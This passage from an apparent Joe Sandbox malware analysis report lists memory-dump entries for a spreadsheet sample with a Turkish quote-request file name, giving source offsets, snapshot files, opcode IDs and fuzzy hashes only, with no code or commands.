                                                  • Instruction Fuzzy Hash: 9BE08C34908108DFC704EBA4E4409ADFBB5EB45301F1091A8D80A17342CB32AE02CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction ID: 9c668b1f98748b2f4f52e113b4f7502b9ba938366519f4d7336fdc9fccc24f4b
                                                  • Opcode Fuzzy Hash: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction Fuzzy Hash: C2E0C234908108EBC704EFA4E4486BCBBB5FB85305F54A1E8CC4813391C732AE42CF81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction ID: 7a09418c21bbc92444f9f1edddc762e0050d87242e08f53915f8d494c6ff81a1
                                                  • Opcode Fuzzy Hash: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction Fuzzy Hash: 5BE08C38908108EBC704DF94E4809ACBBB9EB45305F14A1AD884813391DB32AE42DF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction ID: 09fae601affa48d5136e842802a70a27ecf9718965f04f0f78100c95d59a9854
                                                  • Opcode Fuzzy Hash: f20ab6ff32cb76d78e2e35734e125f31fc9317590225292c4329b6fe02ef8c50
                                                  • Instruction Fuzzy Hash: 25E08C74908108EBC704DF94E4445ADBBB9EB45305F10A1AE884813391DB32AE42CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce27c636b36021677e3c600a8d6e76abc82c007c67f6dc3a3714c109e1ce563f
                                                  • Instruction ID: c29851926a9860a8c10c3b178370824e3040fa9f89433613f0c2aaa430db3ed2
                                                  • Opcode Fuzzy Hash: ce27c636b36021677e3c600a8d6e76abc82c007c67f6dc3a3714c109e1ce563f
                                                  • Instruction Fuzzy Hash: 3AE0127155110CDFC711EFB5D508ADE7BB9EB0A302F0045E6D40593124EBB65A14DB95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b881a7472efe0cdd3b05ab766c50904eba357e3e6c40c9480fa7d6281a983a90
                                                  • Instruction ID: bc7523380c4da32d1b1018e5a3ab88dfee7325bc3db69e931c605e6ffde66ecb
                                                  • Opcode Fuzzy Hash: b881a7472efe0cdd3b05ab766c50904eba357e3e6c40c9480fa7d6281a983a90
                                                  • Instruction Fuzzy Hash: 5CE09A71906289DFCB48DFA4EA4156CBBB4EF4120072005EAC808DB262EB35AE06DB01
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 41f6dc6aa4c6193918a14e9c9f865a5d6ef1022b9dd51bc3bdbe4c2115632ee0
                                                  • Instruction ID: 7961f6d4f16b2b234ae85796c45bc223f28dc5372c9d90c7a2bc2bd19ded9f57
                                                  • Opcode Fuzzy Hash: 41f6dc6aa4c6193918a14e9c9f865a5d6ef1022b9dd51bc3bdbe4c2115632ee0
                                                  • Instruction Fuzzy Hash: A7E08C34908108DBC704DF94E9465ACBBB9EB45305F1091A8880813341CB32AE42CB80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43a19bd603357012f3123c5a6bc3adb69ed22448d580d5ac1d39063754b9f806
                                                  • Instruction ID: 80b84a82b123240db40136ffa107e692afe0d72f2f2e423d9728eba8bf9d4606
                                                  • Opcode Fuzzy Hash: 43a19bd603357012f3123c5a6bc3adb69ed22448d580d5ac1d39063754b9f806
                                                  • Instruction Fuzzy Hash: 57E08C74568244CFC765CBA8D089AAC7FF5FF0A321F1002D9D854CB3A2D332A941DB41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a1448dee5f506755cf77aceb7e8ba8d9a06347ba1e3549cdb8165954184fb52
                                                  • Instruction ID: d9eeb7db9a3b2b6615a60ccc45622948e18e3d2906d296d7ce4c47204af3b97d
                                                  • Opcode Fuzzy Hash: 8a1448dee5f506755cf77aceb7e8ba8d9a06347ba1e3549cdb8165954184fb52
                                                  • Instruction Fuzzy Hash: 50E0EC74929308DFC740DFA8D44A6ACBBF5BB08202F6041A9980992251E7305A50DB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83b7a033ef14803936a5f8d7b565a24534d8846c7b599e7b0d3d7374a3e7afdd
                                                  • Instruction ID: 1ee9338adb983237d1b1b1c291b3d5d68c502ee8e15dcec4d5ceae71f8780c2d
                                                  • Opcode Fuzzy Hash: 83b7a033ef14803936a5f8d7b565a24534d8846c7b599e7b0d3d7374a3e7afdd
                                                  • Instruction Fuzzy Hash: C8D05E70D5A208DFC714EFE4E5449ADBBB9FB46302F1041A8D80A23258C7301E91DBA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed06dee8785afed963523802e12f8550108207881d97bb2bd4dc62795f54fa86
                                                  • Instruction ID: 3401f5151ea5fc33edc5d76e5bbd374ca83e4684abca8c325d307884bb257dd1
                                                  • Opcode Fuzzy Hash: ed06dee8785afed963523802e12f8550108207881d97bb2bd4dc62795f54fa86
                                                  • Instruction Fuzzy Hash: D0E012B1A01309EFCF04DFB5ED41A6D77BAEBA5600F5085A9D40497244DA355E12AB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 50dacd3c32468117b64515a86080751258797e24fb1adbae903cd4ba87871301
                                                  • Instruction ID: 647b1861ec7ba6db2e7008170f15ef63c80a40626a57ab7607e6b4c187ad7606
                                                  • Opcode Fuzzy Hash: 50dacd3c32468117b64515a86080751258797e24fb1adbae903cd4ba87871301
                                                  • Instruction Fuzzy Hash: B4E0C230818108EFCB50DBA8D4442ACBFB4EB05205F5090EDCC8863392D7329E52CB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5f4a79e99154955b33f8b6a25e047823978e3dbb47bf5ef41dd15141eb1f4a3d
                                                  • Instruction ID: 4ef6325e1c22e7e389fb18eae1dc70c98bacb19b22506195cb7ff0944696bb20
                                                  • Opcode Fuzzy Hash: 5f4a79e99154955b33f8b6a25e047823978e3dbb47bf5ef41dd15141eb1f4a3d
                                                  • Instruction Fuzzy Hash: 34D05270519108EBC704CB98E844AACB7BDEB46315F1080AC980A93352CB32AE02CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: badeb1d124d7555906826f29ce6a6c894e48c1522b8a707bec448baa8e91a36b
                                                  • Instruction ID: c4234b89dfb82ead70fb5e3f457f0b63611829874020203f698362ca51d184c8
                                                  • Opcode Fuzzy Hash: badeb1d124d7555906826f29ce6a6c894e48c1522b8a707bec448baa8e91a36b
                                                  • Instruction Fuzzy Hash: 58E01271A0120DEFCB04EFA5EA4165D77B9EB55200F5045A9D408D3305EA755E01A791
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be4241c19f7ae1cbe57a0bfe606adde4412e952c3bf869fd26885791b20153a8
                                                  • Instruction ID: 4aedcb7af74b74f8962dff75267458692c1f683bf059cef90adf7cfc6dc5ad35
                                                  • Opcode Fuzzy Hash: be4241c19f7ae1cbe57a0bfe606adde4412e952c3bf869fd26885791b20153a8
                                                  • Instruction Fuzzy Hash: 50E0E5789501588FCB14EF19D854B9DBB72FB49344F108699E50FA3362DB705D918F10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 51fa57ebbc281e83f01291a10f6c0b3bb5f0dc62cc98e2157c84315e9dabec3e
                                                  • Instruction ID: 875e0100dab7c82258553486916191f7783e4d4b30ddc81955ca24c29589c4ce
                                                  • Opcode Fuzzy Hash: 51fa57ebbc281e83f01291a10f6c0b3bb5f0dc62cc98e2157c84315e9dabec3e
                                                  • Instruction Fuzzy Hash: BFE012749011158FDB14EF29D4957DC7BB1FB59310F008195D55AB3355DB705D81CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa6cbc445cf144049ea56e6fe8faaa7c35398cdbf23ba4c060f2799dc3a48b59
                                                  • Instruction ID: 612137e92d77e6a719ecdb2964989bcd07d354adf8dd5cd665c82b17fce04987
                                                  • Opcode Fuzzy Hash: aa6cbc445cf144049ea56e6fe8faaa7c35398cdbf23ba4c060f2799dc3a48b59
                                                  • Instruction Fuzzy Hash: 24E01274D21214CFD714EF25D494BAD7BB2FB56700F2045A9D40E67255CB345E81CF10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39de63afa265ca6db7ce52739d52248bfd3c7b56d299761f8e3573faaba1fc35
                                                  • Instruction ID: 5806cdc15ff2bbfd2076a923df9ccfa7a29940c2df0e0f1e28413092f943604a
                                                  • Opcode Fuzzy Hash: 39de63afa265ca6db7ce52739d52248bfd3c7b56d299761f8e3573faaba1fc35
                                                  • Instruction Fuzzy Hash: C3E01A78A001589BDB54EF19E4A879C7BB2FB59701F5086E9A00F73351CE305DC69F60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 42a0f93645d8cbd6b626f25a3181e98304d44bcc105b0229bcd9740bd5e8a396
                                                  • Instruction ID: b5fb4a4d7eaf129fa77f46d0bc9798651eb5e6da7ea95a7912f2bba58e14048b
                                                  • Opcode Fuzzy Hash: 42a0f93645d8cbd6b626f25a3181e98304d44bcc105b0229bcd9740bd5e8a396
                                                  • Instruction Fuzzy Hash: 9AE01A74A0121A8FCB98EF65E49479CBBB6EB59700F5081AA900E63364DF345DD6CF21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5392f9f8a772027e02f57868e16f1ba09147a14c6798af0dec19d720d2a4d9b
                                                  • Instruction ID: 6f6e0cf394fd98f606ec548f6846a81064e39d9d9a6d0fa544f9db462261e6e6
                                                  • Opcode Fuzzy Hash: e5392f9f8a772027e02f57868e16f1ba09147a14c6798af0dec19d720d2a4d9b
                                                  • Instruction Fuzzy Hash: 42E09AB8A022098FDB48EF19D84979DBBB1EF96300F0041AA910A77254CA301E828F62
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 86cc31f7c40c3ae0e3d33f7278b357a41781d624af392bce74f23f47d656134c
                                                  • Instruction ID: 45784cd91be8c0f2b9b2fd0d473b215e32f93c150597b0ae1adeb42dbc0f67c2
                                                  • Opcode Fuzzy Hash: 86cc31f7c40c3ae0e3d33f7278b357a41781d624af392bce74f23f47d656134c
                                                  • Instruction Fuzzy Hash: 79D0A73045A208DFC319DBA4A4047AC737DE702246F4030EC944617290DB729D90CB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4c9b3af4b96900534130b218459bb44007898fbc6d43fe4be03a253c4b9b1e3
                                                  • Instruction ID: e5a9e6a429f3f2d17c039dd3ac3ceb9ce58afcfc7743841dc9c1bba481742ba9
                                                  • Opcode Fuzzy Hash: e4c9b3af4b96900534130b218459bb44007898fbc6d43fe4be03a253c4b9b1e3
                                                  • Instruction Fuzzy Hash: FED05E70A0210DEFCF44EFA9EA0095DBBF9EF45300B1141A9D808D7224EB316F059B81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de249843153e1bc7f71d4d94c044b94ead7ebe817f745f95007807bd1626c631
                                                  • Instruction ID: 6562d18aeb25ee5eeba953f2af868a5cb4bb121c62686f7adefed1622d20eb68
                                                  • Opcode Fuzzy Hash: de249843153e1bc7f71d4d94c044b94ead7ebe817f745f95007807bd1626c631
                                                  • Instruction Fuzzy Hash: 49E08C3050411A8FDB10DB1AE48CBB976A6FB45304F0094A5D05992684DE345E849F11
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f611d9a1b28cbbbad295640f65d7eb1eae69d9a28d02806de0d3df8ee1e7b4b5
                                                  • Instruction ID: 2ce8ac5b201e8c89a8ff444aed88e9fe3e48411a6534c2ccc25ca783ff87de2c
                                                  • Opcode Fuzzy Hash: f611d9a1b28cbbbad295640f65d7eb1eae69d9a28d02806de0d3df8ee1e7b4b5
                                                  • Instruction Fuzzy Hash: FDD05EB1044308DFCB028FA8E808D587BB4AB09235F258AA2E848CB2A2D331E440CA00
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0e8f8402c65205ed372e7a15002a10b599515189dfaf490dad1d8975a2d3589
                                                  • Instruction ID: edf23407562188aaa79c7731bdbb769c7e3f960fc486300c676d1767eb815ac6
                                                  • Opcode Fuzzy Hash: a0e8f8402c65205ed372e7a15002a10b599515189dfaf490dad1d8975a2d3589
                                                  • Instruction Fuzzy Hash: 2EE09278A052198BDB64DFA9D44478DBBB2FB68300F10816AD459A3355DB3059818F01
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b8727594e07571af088e4f7d2957dbfe20ce0f86db841e672d793ee0ed1c01f
                                                  • Instruction ID: 1cc8acb68052d0429d0be44f28aba31e21e8bbbb2c3719b884cbb7d8c219f68c
                                                  • Opcode Fuzzy Hash: 1b8727594e07571af088e4f7d2957dbfe20ce0f86db841e672d793ee0ed1c01f
                                                  • Instruction Fuzzy Hash: 0EE09A7494021FCFDB74DF24D945BACBBB0EB55300F0041E5981EA2710EA300A84DF10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e92dfdfd667c4bccb122d2ee47e83961a374c76ef1341987be82832311384d1d
                                                  • Instruction ID: de10e4b5dd08ae9d92abcbc937436738ba3c65986662e1f7e650067c21bc5723
                                                  • Opcode Fuzzy Hash: e92dfdfd667c4bccb122d2ee47e83961a374c76ef1341987be82832311384d1d
                                                  • Instruction Fuzzy Hash: 67D05EB0552218CFCB14DF69DC59B4A7BFAFF44300F1046A58009A7305DB744E818F41
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5eb708566007560d9f85aea95ccd5b733b7d96305bd88fbbbbc90ec1c0902352
                                                  • Instruction ID: 48570726ade9badf4ad1a1c03809ae0e72b573fd242b892c7ab749d87f2cca99
                                                  • Opcode Fuzzy Hash: 5eb708566007560d9f85aea95ccd5b733b7d96305bd88fbbbbc90ec1c0902352
                                                  • Instruction Fuzzy Hash: CBC048B250A7818FDB030A2058A90857FA1AEA722478B00C7D184DA2A3DA2D890A8722
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5e8418ea2133a25b4a4073a16c8f35f2c4509ea06739e531d8426697aa93b815
                                                  • Instruction ID: ee65a397bd99a6d895fe70fb0b41c56a459d6a29dc5fccad6fd0c2587fe31128
                                                  • Opcode Fuzzy Hash: 5e8418ea2133a25b4a4073a16c8f35f2c4509ea06739e531d8426697aa93b815
                                                  • Instruction Fuzzy Hash: D4C08C2006020C8BC221B7F4A40C3FC72A86B0830AF800165D40C100268FE0A030CBB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8bc169de4a6410454310e2e257581b9d3e0b94eb5b519c36d2ea2e97c935eb1b
                                                  • Instruction ID: 8ba415819bf7934d698f997e078d2d02e9fc1dfe43fab938c2017091b2e5f779
                                                  • Opcode Fuzzy Hash: 8bc169de4a6410454310e2e257581b9d3e0b94eb5b519c36d2ea2e97c935eb1b
                                                  • Instruction Fuzzy Hash: 5FD067789052548FDB61CF65E984B59B7F1FF49304F0040A9D509A7315C7741D80DF01
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 78cf6966b1c829a2a7c13a1abebf7c07ad2e23a3504adeb421bf9941fdc3f682
                                                  • Instruction ID: 58406c27a4539c33c757c1e4a9ecbe470c3f1fb269dfbf5bd98166d890d56204
                                                  • Opcode Fuzzy Hash: 78cf6966b1c829a2a7c13a1abebf7c07ad2e23a3504adeb421bf9941fdc3f682
                                                  • Instruction Fuzzy Hash: 24C092B5BA4220BAEF6015A08C0FF98B9728700712F495062E1AAE42C6EAD964C24B75
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1242f386e81732c83d53048c8f6af5181742cd6387857b780abc40188c26c622
                                                  • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                  • Opcode Fuzzy Hash: 1242f386e81732c83d53048c8f6af5181742cd6387857b780abc40188c26c622
                                                  • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f0647a9af9c9b80f1b7f218b685c0371cb3bdf618626f28ec51efcb7fb47397e
                                                  • Instruction ID: a38bd72df0e2560dde95be93f9097d65d3ea9eea4f8771e16c2d0ae743fa4f00
                                                  • Opcode Fuzzy Hash: f0647a9af9c9b80f1b7f218b685c0371cb3bdf618626f28ec51efcb7fb47397e
                                                  • Instruction Fuzzy Hash: 8EC0927AC092908FDF06CB5C88582A9BBB0A95E23039902D38444EB271D7666461ABA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
